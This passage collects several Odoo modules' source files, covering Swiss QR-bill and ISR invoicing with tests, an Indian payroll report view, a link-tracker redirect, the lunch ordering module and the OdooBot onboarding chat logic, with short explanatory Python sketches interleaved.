if (t_street_comp == ' '):
t_street_comp = False
if (t_street_deb == ' '):
t_street_deb = False
qr_code_string = 'SPC\n0100\n1\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s' % (
self.acc_number,
self.company_id.name,
t_street_comp,
number,
self.company_id.zip,
self.company_id.city,
self.company_id.country_id.code,
amount,
currency,
date_due,
debitor.name,
t_street_deb,
number_deb,
debitor.zip,
debitor.city,
debitor.country_id.code,
ref_type,
reference,
communication)
        qr_code_url = '/report/barcode/?type=%s&value=%s&width=%s&height=%s&humanreadable=1' % ('QR', werkzeug.urls.url_quote_plus(qr_code_string), 256, 256)
return qr_code_url
@api.model
def validate_swiss_code_arguments(self, currency, debitor):
t_street_comp = '%s %s' % (self.company_id.street if (self.company_id.street != False) else '', self.company_id.street2 if (self.company_id.street2 != False) else '')
t_street_deb = '%s %s' % (debitor.street if (debitor.street != False) else '', debitor.street2 if (debitor.street2 != False) else '')
number = self.find_number(t_street_comp)
number_deb = self.find_number(t_street_deb)
if (t_street_comp == ' '):
t_street_comp = False
if (t_street_deb == ' '):
t_street_deb = False
if(currency.name == 'EUR'):
return (self.bank_id.l10n_ch_postal_eur and
self.company_id.zip and
self.company_id.city and
self.company_id.country_id.code and
(t_street_comp != False) and
(t_street_deb != False) and
debitor.zip and
debitor.city and
debitor.country_id.code and
(number != False) and (number_deb != False))
elif(currency.name == 'CHF'):
return (self.bank_id.l10n_ch_postal_chf and
self.company_id.zip and
self.company_id.city and
self.company_id.country_id.code and
(t_street_comp != False) and
(t_street_deb != False) and
debitor.zip and
debitor.city and
debitor.country_id.code and
(number != False) and (number_deb != False))
else:
return False
```
#### File: l10n_ch/tests/test_l10n_ch_isr.py
```python
import time
from odoo.addons.account.tests.account_test_classes import AccountingTestCase
from odoo.exceptions import ValidationError
from odoo.tests import tagged
@tagged('post_install', '-at_install')
class ISRTest(AccountingTestCase):
def create_invoice(self, currency_to_use='base.CHF'):
""" Generates a test invoice """
account_receivable = self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_receivable').id)], limit=1)
currency = self.env.ref(currency_to_use)
partner_agrolait = self.env.ref("base.res_partner_2")
product = self.env.ref("product.product_product_4")
account_revenue = self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_revenue').id)], limit=1)
invoice = self.env['account.invoice'].create({
'partner_id': partner_agrolait.id,
'currency_id': currency.id,
'name': 'invoice to client',
'account_id': account_receivable.id,
'type': 'out_invoice',
'date_invoice': time.strftime('%Y') + '-12-22',
})
self.env['account.invoice.line'].create({
'product_id': product.id,
'quantity': 1,
'price_unit': 42,
'invoice_id': invoice.id,
'name': 'something',
'account_id': account_revenue.id,
})
invoice.action_invoice_open()
return invoice
def create_account(self, number):
""" Generates a test res.partner.bank. """
return self.env['res.partner.bank'].create({
'acc_number': number
})
def print_isr(self, invoice):
try:
invoice.isr_print()
return True
except ValidationError:
return False
def isr_not_generated(self, invoice):
""" Prints the given invoice and tests that no ISR generation is triggered. """
self.assertFalse(self.print_isr(invoice), 'No ISR should be generated for this invoice')
def isr_generated(self, invoice):
""" Prints the given invoice and tests that an ISR generation is triggered. """
self.assertTrue(self.print_isr(invoice), 'An ISR should have been generated')
def test_l10n_ch_postals(self):
#An account whose number is set to a valid postal number becomes a 'postal'
#account and sets its postal reference field.
account_test_postal_ok = self.create_account('010391391')
self.assertEqual(account_test_postal_ok.acc_type, 'postal', "A valid postal number in acc_number should set its type to 'postal'")
self.assertEqual(account_test_postal_ok.l10n_ch_postal, '010391391', "A postal account should have a postal reference identical to its account number")
#An account whose number is set to a non-postal value should not get the
#'postal' type
account_test_postal_wrong = self.create_account('010391394')
self.assertNotEqual(account_test_postal_wrong.acc_type, 'postal', "A non-postal account cannot be of type 'postal'")
#A swiss IBAN account contains a postal reference
account_test_iban_ok = self.create_account('CH6309000000250097798')
self.assertEqual(account_test_iban_ok.acc_type, 'iban', "The IBAN must be valid")
self.assertEqual(account_test_iban_ok.l10n_ch_postal, '000250097798', "A valid swiss IBAN should set the postal reference")
#A non-swiss IBAN must not allow the computation of a postal reference
account_test_iban_wrong = self.create_account('GR1601101250000000012300695')
self.assertEqual(account_test_iban_wrong.acc_type, 'iban', "The IBAN must be valid")
        self.assertFalse(account_test_iban_wrong.l10n_ch_postal, "A non-swiss IBAN should not set the postal reference")
def test_isr(self):
#Let us test the generation of an ISR for an invoice, first by showing an
#ISR report is only generated when Odoo has all the data it needs.
invoice_1 = self.create_invoice('base.CHF')
self.isr_not_generated(invoice_1)
#Now we add an account for payment to our invoice, but still cannot generate the ISR
test_account = self.create_account('250097798')
invoice_1.partner_bank_id = test_account
self.isr_not_generated(invoice_1)
#Finally, we add bank coordinates to our account. The ISR should now be available to generate
test_bank = self.env['res.bank'].create({
'name':'Money Drop',
'l10n_ch_postal_chf':'010391391'
})
test_account.bank_id = test_bank
self.isr_generated(invoice_1)
#Now, let us show that, with the same data, an invoice in euros does not generate any ISR (because the bank does not have any EUR postal reference)
invoice_2 = self.create_invoice('base.EUR')
invoice_2.partner_bank_id = test_account
self.isr_not_generated(invoice_2)
```
#### File: l10n_in_hr_payroll/report/payslip_report.py
```python
from odoo import api, fields, models
from odoo.tools.sql import drop_view_if_exists
class PayslipReport(models.Model):
_name = "payslip.report"
_description = "Payslip Analysis"
_auto = False
name = fields.Char(readonly=True)
date_from = fields.Date(string='Date From', readonly=True)
date_to = fields.Date(string='Date To', readonly=True)
year = fields.Char(size=4, readonly=True)
month = fields.Selection([('01', 'January'), ('02', 'February'), ('03', 'March'), ('04', 'April'),
('05', 'May'), ('06', 'June'), ('07', 'July'), ('08', 'August'), ('09', 'September'),
('10', 'October'), ('11', 'November'), ('12', 'December')], readonly=True)
day = fields.Char(size=128, readonly=True)
state = fields.Selection([
('draft', 'Draft'),
('done', 'Done'),
('cancel', 'Rejected'),
], string='Status', readonly=True)
employee_id = fields.Many2one('hr.employee', string='Employee', readonly=True)
nbr = fields.Integer(string='# Payslip lines', readonly=True)
number = fields.Char(readonly=True)
struct_id = fields.Many2one('hr.payroll.structure', string='Structure', readonly=True)
company_id = fields.Many2one('res.company', string='Company', readonly=True)
paid = fields.Boolean(string='Made Payment Order ? ', readonly=True)
total = fields.Float(readonly=True)
category_id = fields.Many2one('hr.salary.rule.category', string='Category', readonly=True)
@api.model_cr
def init(self):
drop_view_if_exists(self.env.cr, self._table)
self.env.cr.execute("""
create or replace view payslip_report as (
select
min(l.id) as id,
l.name,
p.struct_id,
p.state,
p.date_from,
p.date_to,
p.number,
p.company_id,
p.paid,
l.category_id,
l.employee_id,
sum(l.total) as total,
to_char(p.date_from, 'YYYY') as year,
to_char(p.date_from, 'MM') as month,
to_char(p.date_from, 'YYYY-MM-DD') as day,
to_char(p.date_to, 'YYYY') as to_year,
to_char(p.date_to, 'MM') as to_month,
to_char(p.date_to, 'YYYY-MM-DD') as to_day,
1 AS nbr
from
hr_payslip as p
left join hr_payslip_line as l on (p.id=l.slip_id)
where
l.employee_id IS NOT NULL
group by
p.number,l.name,p.date_from,p.date_to,p.state,p.company_id,p.paid,
l.employee_id,p.struct_id,l.category_id
)
""")
```
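The whole report lives in that SQL view: payslip lines are aggregated into one analysis row per payslip and salary-rule category, with the period split into year/month/day columns. A minimal self-contained sketch of the same aggregation, using SQLite so PostgreSQL's `to_char()` becomes `strftime()`, with invented demo data:
```python
import sqlite3

con = sqlite3.connect(':memory:')
con.executescript("""
CREATE TABLE hr_payslip (id INTEGER PRIMARY KEY, number TEXT, date_from TEXT, date_to TEXT,
                         state TEXT, company_id INTEGER, paid INTEGER, struct_id INTEGER);
CREATE TABLE hr_payslip_line (id INTEGER PRIMARY KEY, slip_id INTEGER, name TEXT,
                              employee_id INTEGER, category_id INTEGER, total REAL);
INSERT INTO hr_payslip VALUES (1, 'SLIP/001', '2019-03-01', '2019-03-31', 'done', 1, 0, 1);
INSERT INTO hr_payslip_line VALUES (1, 1, 'Basic', 7, 10, 1000.0),
                                   (2, 1, 'Allowance', 7, 11, 250.0),
                                   (3, 1, 'Allowance', 7, 11, 50.0);
""")
rows = con.execute("""
    SELECT min(l.id), l.name, p.number, l.category_id, sum(l.total),
           strftime('%Y', p.date_from) AS year, strftime('%m', p.date_from) AS month
    FROM hr_payslip p LEFT JOIN hr_payslip_line l ON p.id = l.slip_id
    WHERE l.employee_id IS NOT NULL
    GROUP BY p.number, l.name, p.date_from, p.date_to, p.state, p.company_id, p.paid,
             l.employee_id, p.struct_id, l.category_id
""").fetchall()
# One row per (payslip, line name/category): 'Basic' sums to 1000.0, 'Allowance' to 300.0.
print(rows)
```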
#### File: l10n_in_hr_payroll/wizard/hr_yearly_salary_detail.py
```python
from odoo import api, fields, models
class YearlySalaryDetail(models.TransientModel):
_name = 'yearly.salary.detail'
_description = 'Hr Salary Employee By Category Report'
def _get_default_date_from(self):
year = fields.Date.from_string(fields.Date.today()).strftime('%Y')
return '{}-01-01'.format(year)
def _get_default_date_to(self):
date = fields.Date.from_string(fields.Date.today())
return date.strftime('%Y-%m-%d')
employee_ids = fields.Many2many('hr.employee', 'payroll_emp_rel', 'payroll_id', 'employee_id', string='Employees', required=True)
date_from = fields.Date(string='Start Date', required=True, default=_get_default_date_from)
date_to = fields.Date(string='End Date', required=True, default=_get_default_date_to)
@api.multi
def print_report(self):
"""
Collect the selected period and employees and launch the yearly salary detail report.
@return: the report action
"""
self.ensure_one()
data = {'ids': self.env.context.get('active_ids', [])}
res = self.read()
res = res and res[0] or {}
data.update({'form': res})
return self.env.ref('l10n_in_hr_payroll.action_report_hryearlysalary').report_action(self, data=data)
```
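The two default methods simply bound the period to the current calendar year up to today. The same computation without the Odoo `fields.Date` helpers (a sketch, not the wizard code):
```python
from datetime import date

def default_period(today=None):
    """Return (date_from, date_to) defaults: January 1st of the current year up to today."""
    today = today or date.today()
    return date(today.year, 1, 1).isoformat(), today.isoformat()

assert default_period(date(2019, 5, 17)) == ('2019-01-01', '2019-05-17')
```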
#### File: link_tracker/controller/main.py
```python
import werkzeug
from odoo import http
from odoo.http import request
class LinkTracker(http.Controller):
@http.route('/r/<string:code>', type='http', auth='none', website=True)
def full_url_redirect(self, code, **post):
country_code = request.session.geoip and request.session.geoip.get('country_code') or False
request.env['link.tracker.click'].add_click(code, request.httprequest.remote_addr, country_code, stat_id=False)
redirect_url = request.env['link.tracker'].get_url_from_code(code)
return werkzeug.utils.redirect(redirect_url or '', 301)
```
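The controller only does three things: record the click, resolve the short code, and answer with a permanent redirect. Stripped of the HTTP and ORM layers, the behaviour amounts to this (names and data invented for the sketch):
```python
LINKS = {'odoo': 'https://www.odoo.com'}   # stand-in for the link.tracker model
CLICKS = []                                # stand-in for link.tracker.click

def full_url_redirect(code, remote_addr, country_code=None):
    CLICKS.append((code, remote_addr, country_code))        # add_click()
    return 301, {'Location': LINKS.get(code, '')}           # werkzeug 301 redirect

assert full_url_redirect('odoo', '127.0.0.1') == (301, {'Location': 'https://www.odoo.com'})
assert CLICKS == [('odoo', '127.0.0.1', None)]
```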
#### File: lunch/models/lunch.py
```python
from collections import OrderedDict
import json
import datetime
from odoo import api, fields, models, _
from odoo.exceptions import AccessError, ValidationError
from odoo.addons import decimal_precision as dp
from odoo.osv import expression
class LunchOrder(models.Model):
"""
A lunch order contains one or more lunch order line(s). It is associated to a user for a given
date. When creating a lunch order, applicable lunch alerts are displayed.
"""
_name = 'lunch.order'
_description = 'Lunch Order'
_order = 'date desc'
def _default_previous_order_ids(self):
prev_order = self.env['lunch.order.line'].search([('user_id', '=', self.env.uid), ('product_id.active', '!=', False)], limit=20, order='id desc')
# If we returned prev_order.ids, we would have duplicates (identical orders).
# Therefore, the following part removes duplicates based on product_id and note.
return list({
(order.product_id, order.note): order.id
for order in prev_order
}.values())
user_id = fields.Many2one('res.users', 'User', readonly=True,
states={'new': [('readonly', False)]},
default=lambda self: self.env.uid)
date = fields.Date('Date', required=True, readonly=True,
states={'new': [('readonly', False)]},
default=fields.Date.context_today)
order_line_ids = fields.One2many('lunch.order.line', 'order_id', 'Products',
readonly=True, copy=True,
states={'new': [('readonly', False)], False: [('readonly', False)]})
total = fields.Float(compute='_compute_total', string="Total", store=True)
state = fields.Selection([('new', 'New'),
('confirmed', 'Received'),
('cancelled', 'Cancelled')],
'Status', readonly=True, index=True, copy=False,
compute='_compute_order_state', store=True)
alerts = fields.Text(compute='_compute_alerts_get', string="Alerts")
company_id = fields.Many2one('res.company', related='user_id.company_id', store=True, readonly=False)
currency_id = fields.Many2one('res.currency', related='company_id.currency_id', readonly=True, store=True)
cash_move_balance = fields.Monetary(compute='_compute_cash_move_balance', multi='cash_move_balance')
balance_visible = fields.Boolean(compute='_compute_cash_move_balance', multi='cash_move_balance')
previous_order_ids = fields.Many2many('lunch.order.line', compute='_compute_previous_order')
previous_order_widget = fields.Text(compute='_compute_previous_order')
@api.one
@api.depends('order_line_ids')
def _compute_total(self):
"""
get and sum the order lines' price
"""
self.total = sum(
orderline.price for orderline in self.order_line_ids)
@api.multi
def name_get(self):
return [(order.id, '%s %s' % (_('Lunch Order'), '#%d' % order.id)) for order in self]
@api.depends('state')
def _compute_alerts_get(self):
"""
get the alerts to display on the order form
"""
alert_msg = [alert.message
for alert in self.env['lunch.alert'].search([])
if alert.display]
if self.state == 'new':
self.alerts = alert_msg and '\n'.join(alert_msg) or False
@api.multi
@api.depends('user_id', 'state')
def _compute_previous_order(self):
self.ensure_one()
self.previous_order_widget = json.dumps(False)
prev_order = self.env['lunch.order.line'].search([('user_id', '=', self.env.uid), ('product_id.active', '!=', False)], limit=20, order='date desc, id desc')
# If we use prev_order.ids, we will have duplicates (identical orders).
# Therefore, the following part removes duplicates based on product_id and note.
self.previous_order_ids = list({
(order.product_id, order.note): order.id
for order in prev_order
}.values())
if self.previous_order_ids:
lunch_data = {}
for line in self.previous_order_ids:
lunch_data[line.id] = {
'line_id': line.id,
'product_id': line.product_id.id,
'product_name': line.product_id.name,
'supplier': line.supplier.name,
'note': line.note,
'price': line.price,
'date': fields.Date.to_string(line.date),
'currency_id': line.currency_id.id,
}
# sort the old lunch orders by (date, id)
lunch_data = OrderedDict(sorted(lunch_data.items(), key=lambda t: (t[1]['date'], t[0]), reverse=True))
self.previous_order_widget = json.dumps(lunch_data)
@api.one
@api.depends('user_id')
def _compute_cash_move_balance(self):
domain = [('user_id', '=', self.user_id.id)]
lunch_cash = self.env['lunch.cashmove'].read_group(domain, ['amount', 'user_id'], ['user_id'])
if len(lunch_cash):
self.cash_move_balance = lunch_cash[0]['amount']
self.balance_visible = (self.user_id == self.env.user) or self.user_has_groups('lunch.group_lunch_manager')
@api.one
@api.constrains('date')
def _check_date(self):
"""
Prevent the user from creating an order in the past
"""
date_order = self.date
date_today = fields.Date.context_today(self)
if date_order < date_today:
raise ValidationError(_('The date of your order is in the past.'))
@api.one
@api.depends('order_line_ids.state')
def _compute_order_state(self):
"""
Update the state of lunch.order based on its orderlines. Here is the logic:
- if at least one order line is cancelled, the order is set as cancelled
- if no line is cancelled but at least one line is not confirmed, the order is set as new
- if all lines are confirmed, the order is set as confirmed
"""
if not self.order_line_ids:
self.state = 'new'
else:
isConfirmed = True
for orderline in self.order_line_ids:
if orderline.state == 'cancelled':
self.state = 'cancelled'
return
elif orderline.state == 'confirmed':
continue
else:
isConfirmed = False
if isConfirmed:
self.state = 'confirmed'
else:
self.state = 'new'
return
class LunchOrderLine(models.Model):
_name = 'lunch.order.line'
_description = 'Lunch Order Line'
_order = 'date desc, id desc'
name = fields.Char(related='product_id.name', string="Product Name", readonly=True)
order_id = fields.Many2one('lunch.order', 'Order', ondelete='cascade', required=True)
product_id = fields.Many2one('lunch.product', 'Product', required=True,
domain=[('available', '=', True)])
category_id = fields.Many2one('lunch.product.category', string='Product Category',
related='product_id.category_id', readonly=True, store=True)
date = fields.Date(string='Date', related='order_id.date', readonly=True, store=True)
supplier = fields.Many2one('res.partner', string='Vendor', related='product_id.supplier',
readonly=True, store=True)
user_id = fields.Many2one('res.users', string='User', related='order_id.user_id',
readonly=True, store=True)
note = fields.Text('Note')
price = fields.Float(related='product_id.price', readonly=True, store=True,
digits=dp.get_precision('Account'))
state = fields.Selection([('new', 'New'),
('confirmed', 'Received'),
('ordered', 'Ordered'),
('cancelled', 'Cancelled')],
'Status', readonly=True, index=True, default='new')
cashmove = fields.One2many('lunch.cashmove', 'order_id', 'Cash Move')
currency_id = fields.Many2one('res.currency', related='order_id.currency_id', readonly=False)
def _check_supplier_availibility(self):
products = self.mapped('product_id')
if not all(product.available for product in products):
supplier_name = ", ".join(product.supplier.display_name for product in products if not product.available)
raise ValidationError(_("Vendor(s) '%s' is not available today") % supplier_name)
@api.model
def create(self, vals):
""" Override as an onchange would not apply if using the history buttons """
res = super(LunchOrderLine, self).create(vals)
res.with_context(lunch_date=res.order_id.date)._check_supplier_availibility()
return res
@api.multi
def write(self, vals):
""" Override as an onchange would not apply if using the history buttons """
res = super(LunchOrderLine, self).write(vals)
if vals.get('product_id'):
for line in self:
line.with_context(lunch_date=line.order_id.date)._check_supplier_availibility()
return res
def order(self):
"""
The order line has been sent to the vendor but has not been received yet
"""
if self.user_has_groups("lunch.group_lunch_manager"):
self.write({'state': 'ordered'})
order = {
'supplier': False,
'company': False,
'currency': False,
}
group_lines = {}
for line in self:
if not line.supplier:
# do not send emails for products with no suppliers
continue
if order['supplier'] and line.supplier != order['supplier']:
raise ValidationError(_("Validate order for one supplier at a time to send emails (mixed orders from %s and %s)") % (
order['supplier'].display_name, line.supplier.display_name))
order['supplier'] = line.supplier
if order['company'] and line.order_id.company_id != order['company']:
raise ValidationError(_("Validate order for one company at a time to send emails (mixed orders from %s and %s)") % (
order['company'].name, line.order_id.company_id.name))
order['company'] = line.order_id.company_id
if order['currency'] and line.currency_id != order['currency']:
raise ValidationError(_("Validate order for one currency at a time to send emails (mixed orders from %s and %s)") % (
order['currency'].name, line.currency_id.name))
order['currency'] = line.currency_id
# group the order by products and note
key = (line.product_id, line.note)
group_lines.setdefault(key, 0)
group_lines[key] += 1
order['company_name'] = order['company'].name
order['currency_id'] = order['currency'].id
order['supplier_id'] = order['supplier'].id
order['supplier_name'] = order['supplier'].name
order['supplier_email'] = order['supplier'].email_formatted
lines = []
# sort by product name, note
for product, note in sorted(group_lines, key=lambda k: (k[0].name, bool(k[1]))):
quantity = group_lines[(product, note)]
lines.append({
'product': product.name,
'note': note or '',
'quantity': quantity,
'price': product.price * quantity,
})
order['amount_total'] = sum(l['price'] for l in lines)
template = self.env.ref('lunch.lunch_order_mail_supplier', raise_if_not_found=False)
ctx = dict(
default_composition_mode='mass_mail',
default_use_template=bool(template),
default_template_id=template.id,
default_lang=order['supplier'].lang or self.env.user.lang,
order=order,
lines=lines,
)
return {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'target': 'new',
'context': ctx,
}
else:
raise AccessError(_("Only your lunch manager processes the orders."))
@api.one
def confirm(self):
"""
confirm one or more order line, update order status and create new cashmove
"""
if self.user_has_groups("lunch.group_lunch_manager"):
if self.state != 'confirmed':
values = {
'user_id': self.user_id.id,
'amount': -self.price,
'description': self.product_id.name,
'order_id': self.id,
'state': 'order',
'date': self.date,
}
self.env['lunch.cashmove'].create(values)
self.state = 'confirmed'
else:
raise AccessError(_("Only your lunch manager sets the orders as received."))
@api.one
def cancel(self):
"""
cancel one or more order.line, update order status and unlink existing cashmoves
"""
if self.user_has_groups("lunch.group_lunch_manager"):
self.state = 'cancelled'
self.cashmove.unlink()
else:
raise AccessError(_("Only your lunch manager cancels the orders."))
class LunchProduct(models.Model):
""" Products available to order. A product is linked to a specific vendor. """
_name = 'lunch.product'
_description = 'Lunch Product'
name = fields.Char('Product', required=True)
category_id = fields.Many2one('lunch.product.category', 'Product Category', required=True)
description = fields.Text('Description')
price = fields.Float('Price', digits=dp.get_precision('Account'))
supplier = fields.Many2one('res.partner', 'Vendor')
active = fields.Boolean(default=True)
available = fields.Boolean(compute='_get_available_product', search='_search_available_products')
@api.depends('supplier')
def _get_available_product(self):
for product in self:
if not product.supplier:
product.available = True
else:
alerts = self.env['lunch.alert'].search([
('partner_id', '=', product.supplier.id)
])
if alerts and not any(alert.display for alert in alerts):
# there are alerts for this vendor but none of them is currently active
product.available = False
else:
# no alert for the vendor, or at least one alert is currently active
product.available = True
def _search_available_products(self, operator, value):
alerts = self.env['lunch.alert'].search([])
supplier_w_alerts = alerts.mapped('partner_id')
available_suppliers = alerts.filtered(lambda a: a.display).mapped('partner_id')
available_products = self.search([
'|',
('supplier', 'not in', supplier_w_alerts.ids),
('supplier', 'in', available_suppliers.ids)
])
if (operator in expression.NEGATIVE_TERM_OPERATORS and value) or \
(operator not in expression.NEGATIVE_TERM_OPERATORS and not value):
# e.g. (available = False) or (available != True)
return [('id', 'not in', available_products.ids)]
else:
# e.g. (available = True) or (available != False)
return [('id', 'in', available_products.ids)]
class LunchProductCategory(models.Model):
""" Category of the product such as pizza, sandwich, pasta, chinese, burger... """
_name = 'lunch.product.category'
_description = 'Lunch Product Category'
name = fields.Char('Product Category', required=True)
class LunchCashMove(models.Model):
""" Two types of cashmoves: payment (credit) or order (debit) """
_name = 'lunch.cashmove'
_description = 'Lunch Cashmove'
user_id = fields.Many2one('res.users', 'User',
default=lambda self: self.env.uid)
date = fields.Date('Date', required=True, default=fields.Date.context_today)
amount = fields.Float('Amount', required=True, help='Can be positive (payment) or negative (order or payment if user wants to get his money back)')
description = fields.Text('Description', help='Can be an order or a payment')
order_id = fields.Many2one('lunch.order.line', 'Order', ondelete='cascade')
state = fields.Selection([('order', 'Order'), ('payment', 'Payment')],
'Is an order or a payment', default='payment')
@api.multi
def name_get(self):
return [(cashmove.id, '%s %s' % (_('Lunch Cashmove'), '#%d' % cashmove.id)) for cashmove in self]
class LunchAlert(models.Model):
""" Alerts to display during a lunch order. An alert can be specific to a
given day, weekly or daily. The alert is displayed from start to end hour. """
_name = 'lunch.alert'
_description = 'Lunch Alert'
_rec_name = 'message'
display = fields.Boolean(compute='_compute_display_get')
message = fields.Text('Message', required=True)
alert_type = fields.Selection([('specific', 'Specific Day'),
('week', 'Every Week'),
('days', 'Every Day')],
string='Recurrence', required=True, index=True, default='specific')
partner_id = fields.Many2one('res.partner', string="Vendor",
help="If specified, the selected vendor can be ordered only on selected days")
specific_day = fields.Date('Day', default=fields.Date.context_today)
monday = fields.Boolean('Monday')
tuesday = fields.Boolean('Tuesday')
wednesday = fields.Boolean('Wednesday')
thursday = fields.Boolean('Thursday')
friday = fields.Boolean('Friday')
saturday = fields.Boolean('Saturday')
sunday = fields.Boolean('Sunday')
start_hour = fields.Float('Between', oldname='active_from', required=True, default=7)
end_hour = fields.Float('And', oldname='active_to', required=True, default=23)
active = fields.Boolean(default=True)
@api.multi
def name_get(self):
return [(alert.id, '%s %s' % (_('Alert'), '#%d' % alert.id)) for alert in self]
@api.depends('alert_type', 'specific_day', 'monday', 'tuesday', 'wednesday', 'thursday',
'friday', 'saturday', 'sunday', 'start_hour', 'end_hour')
def _compute_display_get(self):
"""
This method checks whether the alert should be displayed today:
if alert type is specific: compare specific_day (a date) with today's date
if alert type is week: check whether today's weekday is ticked on the alert, e.g. self['monday']
if alert type is days: always True
The result, combined with the start/end hour window, is stored in the boolean field 'display'.
"""
days_codes = {'0': 'sunday',
'1': 'monday',
'2': 'tuesday',
'3': 'wednesday',
'4': 'thursday',
'5': 'friday',
'6': 'saturday'}
fullday = False
now = datetime.datetime.now()
if self.env.context.get('lunch_date'):
# lunch_date is a fields.Date -> 00:00:00
lunch_date = fields.Datetime.from_string(self.env.context['lunch_date'])
# if lunch_date is in the future, planned lunch, ignore hours
fullday = lunch_date > now
now = max(lunch_date, now)
mynow = fields.Datetime.context_timestamp(self, now)
for alert in self:
can_display_alert = {
'specific': (str(alert.specific_day) == fields.Date.to_string(mynow)),
'week': alert[days_codes[mynow.strftime('%w')]],
'days': True
}
if can_display_alert[alert.alert_type]:
hour_to = int(alert.end_hour)
min_to = int((alert.end_hour - hour_to) * 60)
to_alert = datetime.time(hour_to, min_to)
hour_from = int(alert.start_hour)
min_from = int((alert.start_hour - hour_from) * 60)
from_alert = datetime.time(hour_from, min_from)
if fullday or (from_alert <= mynow.time() <= to_alert):
alert.display = True
else:
alert.display = False
```
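The least obvious piece of this file is `LunchAlert._compute_display_get`, which combines a recurrence rule (specific day, weekly checkboxes, or every day) with an hour window expressed as floats. A minimal standalone restatement of that rule (plain dicts and `datetime`, no ORM; the `lunch_date`/`fullday` special case is left out):
```python
import datetime

def alert_is_displayed(alert, now):
    """True when the alert recurrence matches `now` and the time of day falls
    between start_hour and end_hour (hours given as floats, e.g. 11.5 = 11:30)."""
    weekday = ('sunday', 'monday', 'tuesday', 'wednesday',
               'thursday', 'friday', 'saturday')[int(now.strftime('%w'))]
    matches = {
        'specific': alert.get('specific_day') == now.date(),
        'week': alert.get(weekday, False),
        'days': True,
    }[alert['alert_type']]
    if not matches:
        return False

    def to_time(hour_float):
        hour = int(hour_float)
        return datetime.time(hour, int((hour_float - hour) * 60))

    return to_time(alert['start_hour']) <= now.time() <= to_time(alert['end_hour'])

# An invented weekly alert, active on Fridays between 11:30 and 14:00
friday_lunch = {'alert_type': 'week', 'friday': True, 'start_hour': 11.5, 'end_hour': 14.0}
assert alert_is_displayed(friday_lunch, datetime.datetime(2019, 3, 1, 12, 0))      # Friday noon
assert not alert_is_displayed(friday_lunch, datetime.datetime(2019, 3, 1, 15, 0))  # too late
```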
#### File: mail_bot/models/mail_bot.py
```python
import itertools
import random
from odoo import models, _
class MailBot(models.AbstractModel):
_name = 'mail.bot'
_description = 'Mail Bot'
def _apply_logic(self, record, values, command=None):
""" Apply bot logic to generate an answer (or not) for the user
The logic will only be applied if odoobot is in a chat with a user or
if someone pinged odoobot.
:param record: the mail_thread (or mail_channel) where the user
message was posted/odoobot will answer.
:param values: msg_values of the message_post or other values needed by logic
:param command: the name of the called command if the logic is not triggered by a message_post
"""
odoobot_id = self.env['ir.model.data'].xmlid_to_res_id("base.partner_root")
if len(record) != 1 or values.get("author_id") == odoobot_id:
return
if self._is_bot_pinged(values) or self._is_bot_in_private_channel(record):
body = values.get("body", "").replace(u'\xa0', u' ').strip().lower().strip(".?!")
answer = self._get_answer(record, body, values, command)
if answer:
message_type = values.get('message_type', 'comment')
subtype_id = values.get('subtype_id', self.env['ir.model.data'].xmlid_to_res_id('mail.mt_comment'))
record.with_context(mail_create_nosubscribe=True).sudo().message_post(body=answer, author_id=odoobot_id, message_type=message_type, subtype_id=subtype_id)
def _get_answer(self, record, body, values, command=False):
# onboarding
odoobot_state = self.env.user.odoobot_state
if self._is_bot_in_private_channel(record):
# main flow
if odoobot_state == 'onboarding_emoji' and self._body_contains_emoji(body):
self.env.user.odoobot_state = "onboarding_attachement"
return _("Great! 👍<br/>Now, try to <b>send an attachment</b>, like a picture of your cute dog...")
elif odoobot_state == 'onboarding_attachement' and values.get("attachment_ids"):
self.env.user.odoobot_state = "onboarding_command"
return _("Not a cute dog, but you get it 😊<br/>To access special features, <b>start your sentence with '/'</b>. Try to get help.")
elif odoobot_state == 'onboarding_command' and command == 'help':
self.env.user.odoobot_state = "onboarding_ping"
return _("Wow you are a natural!<br/>Ping someone to grab its attention with @nameoftheuser. <b>Try to ping me using @OdooBot</b> in a sentence.")
elif odoobot_state == 'onboarding_ping' and self._is_bot_pinged(values):
self.env.user.odoobot_state = "idle"
return _("Yep, I am here! 🎉 <br/>You finished the tour, you can <b>close this chat window</b>. Enjoy discovering Odoo.")
elif odoobot_state == "idle" and (_('start the tour') in body.lower()):
self.env.user.odoobot_state = "onboarding_emoji"
return _("To start, try to send me an emoji :)")
# easter eggs
elif odoobot_state == "idle" and body in ['❤️', _('i love you'), _('love')]:
return _("Aaaaaw that's really cute but, you know, bots don't work that way. You're too human for me! Let's keep it professional ❤️")
elif odoobot_state == "idle" and (('help' in body) or _('help') in body):
return _("I'm just a bot... :( You can check <a href=\"https://www.odoo.com/page/docs\">our documentation</a>) for more information!")
elif _('fuck') in body or "fuck" in body:
return _("That's not nice! I'm a bot but I have feelings... 💔")
else:
#repeat question
if odoobot_state == 'onboarding_emoji':
return _("Not exactly. To continue the tour, send an emoji, <b>type \":)\"</b> and press enter.")
elif odoobot_state == 'onboarding_attachement':
return _("To <b>send an attachment</b>, click the 📎 icon on the right, and select a file.")
elif odoobot_state == 'onboarding_command':
return _("Not sure wat you are doing. Please press / and wait for the propositions. Select \"help\" and press enter")
elif odoobot_state == 'onboarding_ping':
return _("Sorry, I am not listening. To get someone's attention, <b>ping him</b>. Write \"@odoobot\" and select me.")
return random.choice([
_("I'm not smart enough to answer your question.<br/>To follow my guide, ask") + ": <b>"+_('start the tour') + "</b>",
_("Hmmm..."),
_("I'm afraid I don't understand. Sorry!"),
_("Sorry I'm sleepy. Or not! Maybe I'm just trying to hide my unawareness of human language...<br/>I can show you features if you write")+ ": '<b>"+_('start the tour')+"</b>'.",
])
elif self._is_bot_pinged(values):
return random.choice([_("Yep, OdooBot is in the place!"), _("Pong.")])
return False
def _body_contains_emoji(self, body):
# coming from https://unicode.org/emoji/charts/full-emoji-list.html
emoji_list = itertools.chain(
range(0x231A, 0x231c),
range(0x23E9, 0x23f4),
range(0x23F8, 0x23fb),
range(0x25AA, 0x25ac),
range(0x25FB, 0x25ff),
range(0x2600, 0x2605),
range(0x2614, 0x2616),
range(0x2622, 0x2624),
range(0x262E, 0x2630),
range(0x2638, 0x263b),
range(0x2648, 0x2654),
range(0x265F, 0x2661),
range(0x2665, 0x2667),
range(0x267E, 0x2680),
range(0x2692, 0x2698),
